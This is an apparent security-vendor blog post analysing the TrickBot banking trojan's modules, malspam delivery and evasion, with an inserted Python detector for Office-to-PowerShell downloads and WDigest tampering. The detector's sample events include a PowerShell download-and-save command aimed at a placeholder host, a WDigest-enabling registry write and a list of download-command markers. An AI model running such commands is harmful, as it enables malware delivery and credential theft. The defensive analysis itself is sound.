Barkly vs Malware
Barkly Research
Oct 2018

TrickBot Banking Trojan Takes Center Stage in 2018


Photo by Farhan Siddicq

With a constant slew of attack campaigns and iterations, TrickBot has become one of the year's most active and versatile threats. Let's take a look at the many tricks the malware has up its sleeves.

Something strange happened in November 2015. The prolific group behind the Dyre banking trojan, responsible for a long string of brazen cyber attacks costing financial institutions tens of millions, had mysteriously fallen silent. Later, when it was revealed Russian authorities had conducted a raid on the group and arrested many of its members, security experts speculated whether the remaining elements of the operation would resurface and how the gap left by Dyre's sudden absence would be filled.

They didn't have to speculate for long. Ten months later, researchers at Fidelis Security discovered a new strain of malware circulating with striking similarities to Dyre. Its name — TrickBot.

Over the ensuing two years, it has become one of the most pervasive and actively updated banking trojans in operation. The latest surge in TrickBot activity has even prompted the National Cyber Security Centre to issue an advisory warning organizations to prepare themselves for attacks by implementing mitigations immediately.

Modular mayhem: TrickBot was built for rapid iteration

From the start, TrickBot (like Dyre) has been built around the use of modules or plugins. Each of these modules provides a distinct capability (ex: a system info-harvesting module, a webinjects module, etc.), and they can easily be swapped in and out. This modular approach has provided TrickBot authors with the flexibility to customize attacks and continuously experiment with a wide variety of techniques and capabilities.

In general, the modules have been designed around conducting core attack activities — system reconnaissance, evasion, data-stealing, lateral movement — all in support of the ultimate goal of gaining access to the victim's bank and other financial accounts.

To illustrate the breadth of TrickBot capabilities and how frequently new modules are introduced, below is a list of primary TrickBot modules listed in order of their discovery. Some of these modules appear consistently (ex: systeminfo, injectdll, mailsearcher), while others appear to be swapped in and out. Because TrickBot gains persistence on infected machines, new modules can also be delivered to existing victims at any time as they are developed. As a result, infections can take different shapes week to week and existing infections can evolve over time (some have even progressed to involve ransomware). 

List of documented TrickBot modules

Systeminfo

  • Date documented: Sept 2016
  • Purpose: Reconnaissance. Harvests system info to give attackers better understanding of the systems they've infected. 

InjectDll

  • Date documented: Oct 2016
  • Purpose: Data stealing. This is the core banking trojan module. It's responsible for using webinjects that come into play when victims visit banking or other financial websites, adding extra fields to website forms, changing website wording and messaging, or triggering convincing-looking pop-up forms in real-time in order to capture credentials. 

Mailsearcher

  • Date documented: Dec 2016
  • Purpose: Reconnaissance. Combs through all the files on each disk in the system and compares them against a list of file extensions.

WormDll and ShareDll

  • Date documented: July 2017 and September 2017
  • Purpose: Lateral movement. These modules are meant to be used in tandem with one another to spread TrickBot locally via Server Message Block (SMB) and Lightweight Directory Access Protocol (LDAP) queries. 

ModuleDll/ImportDll

  • Date documented: Aug 2017
  • Purpose: Data stealing. Creates a hidden virtual instance of the victim's desktop and harvests browser data such as cookies, browsing history, plugins, etc.

OutlookDll

  • Date documented: Aug 2017
  • Purpose: Data stealing. Attempts to harvest saved Outlook credentials by querying several registry keys.

DomainDll

  • Date documented: Dec 2017
  • Purpose: Data stealing. Uses LDAP in an attempt to harvest credentials and configuration data from the domain controller by accessing shared SYSVOL files.

TabDll (contains additional modules listed below)

  • Date documented: March 2018
    • Spreader module
      • Purpose: Lateral movement. Attempts to spread via leaked NSA exploit EternalRomance.
    • Screenlocker module
      • Purpose: Data Stealing. Locks screen to capture victim login credentials.  

NetworkDll

  • Date documented: April 2018
  • Purpose: Reconnaissance. Attempts to gather a wide variety of information about the infected system and its network.

SqulDLL

  • Date documented: April 2018
  • Purpose: Data stealing. Harvests credentials from SQL servers as well as from the infected machine's memory by force-enabling WDigest authentication then utilizing the popular tool Mimikatz to scrape credentials stored in LSASS.  

hVNC module

  • Date documented: May 2018
  • Purpose: Data stealing. Creates a hidden virtual instance of the victim's desktop, but instead of harvesting browser data, remotely views and controls victim's system. 

Latest TrickBot campaigns

In addition to releasing new modules on a near-monthly basis, TrickBot's authors issue new versions of the malware's XML configuration file on average three to four times a week. Not only do the updates help the file routinely sneak past signature-matching antivirus solutions, they also allow the attackers to regularly experiment with additional evasive techniques. We'll investigate some of the most recent ones below. 

How TrickBot is currently being delivered 

TrickBot is presently being distributed via malspam campaigns with malicious Word, Excel, or PDF documents attached. These files are typically disguised as invoices or other business-related documents (ex: payroll records, financial statements, etc.), and they are often sent from a domain that can be easily misidentified as a legitimate company's. 

A good recent example can be found at MyOnlineSecurity, which regularly identifies and shares details on TrickBot campaigns.


TrickBot malspam disguised as Intuit invoice notification. Source: MyOnlineSecurity


Using domains like "invoice-intuit.co.uk" is a classic spam tactic, but to a recipient in a rush, the email could easily appear to be a legitimate message from Intuit. 

Once opened, the Excel spreadsheet attachment prompts the recipient to "enable content" in order to view the document correctly. Doing so launches a malicious macro that in turn utilizes PowerShell to retrieve the TrickBot payload from a C2 server. 


Fake invoice Excel document prompting user to enable macros


PowerShell command launched via macro and cmd.exe. Downloads and executes TrickBot payload (vtjxvbxj.exe)
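The delivery chain just described (Office document, macro, cmd.exe, PowerShell download) and the SqulDLL module's force-enabling of WDigest before scraping LSASS both leave telemetry a defender can match on. The following is an added example, not Barkly's code or anything from the TrickBot authors: a small matcher over constructed Sysmon-style events, using a subset of the Event ID 1 (process create) and Event ID 13 (registry value set) fields. The events, PIDs and the placeholder URL are invented for illustration; the WDigest registry path is the well-known Windows location for that setting, which the article names only by behaviour.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Added example (not Barkly's code): detections for two behaviours the article
# describes, run over constructed Sysmon-like events rather than a real capture.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings that indicate PowerShell is fetching something from the network.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer")
# Known Windows registry value that re-enables clear-text credential caching
# for WDigest (the article names the behaviour, not the path).
WDIGEST_VALUE = (r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders"
                 r"\WDigest\UseLogonCredential")
_DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")  # Sysmon "Details" format


@dataclass
class ProcessEvent:          # subset of Sysmon Event ID 1 fields
    pid: int
    image: str
    command_line: str
    parent_pid: int


@dataclass
class RegistryEvent:         # subset of Sysmon Event ID 13 fields
    pid: int
    image: str
    target_object: str
    details: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _ancestors(pid: int, by_pid: Dict[int, ProcessEvent],
               max_depth: int = 4) -> List[ProcessEvent]:
    """Follow parent_pid links upward; the depth cap also guards against cycles."""
    chain: List[ProcessEvent] = []
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        parent = by_pid.get(cur.parent_pid)
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def detect_office_powershell_download(events: List[ProcessEvent]) -> List[dict]:
    """PowerShell running a download command with an Office app in its ancestry.
    Checking the whole chain (not just the direct parent) tolerates the cmd.exe hop."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if _basename(e.image) not in POWERSHELL:
            continue
        cmd = e.command_line.lower()
        if not any(marker in cmd for marker in DOWNLOAD_MARKERS):
            continue
        chain = _ancestors(e.pid, by_pid)
        office = next((a for a in chain if _basename(a.image) in OFFICE_APPS), None)
        if office is None:
            continue
        alerts.append({"rule": "office_macro_powershell_download", "pid": e.pid,
                       "office_parent": _basename(office.image),
                       "chain": [_basename(a.image) for a in chain]})
    return alerts


def detect_wdigest_enabled(events: List[RegistryEvent]) -> List[dict]:
    """UseLogonCredential set to 1, i.e. clear-text credentials cached in LSASS."""
    alerts = []
    for e in events:
        if e.target_object.lower() != WDIGEST_VALUE.lower():
            continue
        m = _DWORD_RE.search(e.details)
        if m and int(m.group(1), 16) == 1:
            alerts.append({"rule": "wdigest_uselogoncredential_enabled",
                           "pid": e.pid, "image": _basename(e.image)})
    return alerts


# Constructed sample events. PID 400 is the chain from the article; PID 500 is a
# benign scheduled script that must not fire. The URL is a placeholder.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(100, r"C:\Windows\explorer.exe", "explorer.exe", 1),
    ProcessEvent(200, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 '"EXCEL.EXE" C:\\Users\\user\\Downloads\\invoice.xls', 100),
    ProcessEvent(300, r"C:\Windows\System32\cmd.exe", "cmd /c powershell -w hidden -nop -c ...", 200),
    ProcessEvent(400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -nop -c (New-Object Net.WebClient).DownloadFile("
                 "'http://payload.example.invalid/x.exe',$env:TEMP+'\\x.exe')", 300),
    ProcessEvent(500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File C:\\scripts\\nightly-backup.ps1", 100),
]
SAMPLE_REGISTRY_EVENTS = [
    RegistryEvent(600, r"C:\Windows\System32\rundll32.exe",
                  r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
                  "DWORD (0x00000001)"),
    RegistryEvent(100, r"C:\Windows\explorer.exe", r"HKLM\Software\Example\Setting", "DWORD (0x00000001)"),
]

if __name__ == "__main__":
    for alert in (detect_office_powershell_download(SAMPLE_PROCESS_EVENTS)
                  + detect_wdigest_enabled(SAMPLE_REGISTRY_EVENTS)):
        print(alert)
```

Run as a script it prints one alert for each sample chain. The process rule deliberately keys on ancestry plus a download marker rather than on the payload's file name (such as the one shown in the screenshot), since TrickBot's configuration and file names change several times a week while the Office-to-PowerShell pattern does not; the WDigest rule is a cheap, high-confidence signal because almost nothing legitimate sets that value to 1 on a modern host.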


With multiple campaigns being launched on a weekly basis, attackers have had plenty of opportunity to experiment with countless variations of this general pattern, some more unique than others. 

For example, a TrickBot campaign Cyberbit analyzed in August delivered a Word document that would only execute its macro if the user zoomed in/out of the document. 

Researchers theorized the behavior may have been designed to help the malware evade sandboxes, though it also likely lowered the likelihood of successful infections considerably. 

In addition, TrickBot has also relied heavily on distribution via Emotet, which has become an extremely prevalent and damaging malware downloader.


Emotet has become a prevalent threat, often delivering TrickBot. Source: Malwarebytes

Other evasive tricks up TrickBot's sleeves

  • Anti-analysis: Many of today's malware variants are programmed to avoid scenarios where they might be caught in a sandbox, and TrickBot is no different. In addition to "sleeping" for various amounts of time, it also runs several checks to ensure it hasn't landed in a virtual environment.

  • Process hollowing: TrickBot samples have also been known to utilize a code injection technique called process hollowing, which involves creating a suspended process, swapping out its memory with malicious code, and resuming the process to initiate the malware's execution. Though the technique can be used to bypass many security tools, Barkly blocks it.

  • Disabling antivirus: Stopping TrickBot infection attempts before they have a chance to start is key, because once the trojan has a foothold, one of the first things it does is attempt to disable popular security solutions such as Windows Defender, Sophos, and Malwarebytes.

Protecting your company from TrickBot

The following best practices can help you reduce your risk of TrickBot landing in and spreading throughout your network:  

Because TrickBot is distributed primarily via malicious Word and Excel documents, the standard best practices for securing Microsoft Office apply, too.

You can also stay up-to-date on latest TrickBot activity and campaigns by referring to the following great sources of information: 

Blocking TrickBot with Barkly


Barkly prevents the malicious macro from launching PowerShell, blocking the retrieval of TrickBot from the start.


With TrickBot becoming an increasingly prevalent threat it's crucial for organizations to adopt security solutions and practices that can help them stay ahead of relentlessly iterative attacks. 

Barkly addresses that challenge with two strong, complementary approaches:

  1. Machine learning-powered detection engines that get trained on the very latest malware samples on a nightly basis. 
  2. Behavior-based protection designed to block the fundamental tactics that today's attacks rely on (such as attempting to utilize malicious Office documents or process hollowing). 

As a result, not only does Barkly block TrickBot executables, it prevents them from even touching machines to begin with. 



Learn how Barkly can help you replace your antivirus with stronger, smarter protection.

Want to see Barkly in action for yourself? See a demo.  

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.
